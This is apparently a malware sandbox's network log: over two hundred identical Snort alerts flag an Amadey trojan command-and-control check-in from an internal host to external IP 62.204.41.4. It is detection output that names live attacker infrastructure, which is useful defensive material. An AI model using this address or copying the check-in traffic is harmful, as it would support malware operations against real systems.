                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49716 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49717 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49718 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49719 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49720 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49721 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49722 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49723 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49724 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49725 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49726 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49727 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49728 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49729 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49730 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49731 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49732 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49733 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49734 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49735 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49736 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49737 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49738 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49739 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49740 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49741 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49742 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49743 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49744 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49745 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49746 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49747 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49748 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49749 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49750 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49751 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49752 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49753 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49754 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49755 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49756 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49757 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49758 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49759 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49760 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49761 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49762 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49763 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49764 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49765 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49766 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49767 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49768 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49769 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49770 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49771 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49772 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49773 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49774 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49775 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49776 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49777 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49778 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49779 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49780 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49781 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49782 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49783 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49784 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49785 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49786 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49787 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49788 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49789 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49790 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49791 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49792 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49793 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49794 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49795 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49796 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49797 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49798 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49799 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49800 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49801 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49802 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49803 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49804 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49805 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49806 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49807 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49808 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49809 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49810 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49811 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49812 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49813 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49814 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49815 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49816 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49817 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49818 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49819 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49820 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49821 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49822 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49823 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49824 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49825 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49826 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49827 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49828 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49829 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49830 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49831 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49832 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49833 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49834 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49835 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49836 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49837 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49838 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49839 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49840 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49841 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49842 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49843 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49844 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49845 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49846 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49847 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49848 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49849 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49850 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49851 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49852 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49853 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49854 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49855 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49856 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49857 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49858 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49859 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49860 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49861 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49862 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49863 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49864 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49865 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49866 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49867 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49868 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49869 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49870 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49871 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49872 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49873 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49874 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49875 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49876 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49877 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49878 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49879 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49880 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49881 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49882 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49883 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49884 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49885 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49886 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49887 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49888 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49889 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49890 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49891 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49892 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49893 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49894 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49895 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49896 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49897 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49898 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49899 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49900 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49901 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49902 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49903 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49904 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49905 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49906 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49907 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49908 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49909 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49910 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49911 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49912 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49913 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49914 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49915 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49916 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49917 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49918 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49919 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49920 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49921 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49922 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49923 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49924 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49925 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49926 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49927 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49928 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49929 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49930 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49931 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49932 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49933 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49934 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49935 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49936 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49937 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49938 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49939 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49940 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49941 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49942 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49943 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49944 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49945 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49946 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49947 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49948 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49949 -> 62.204.41.4:80
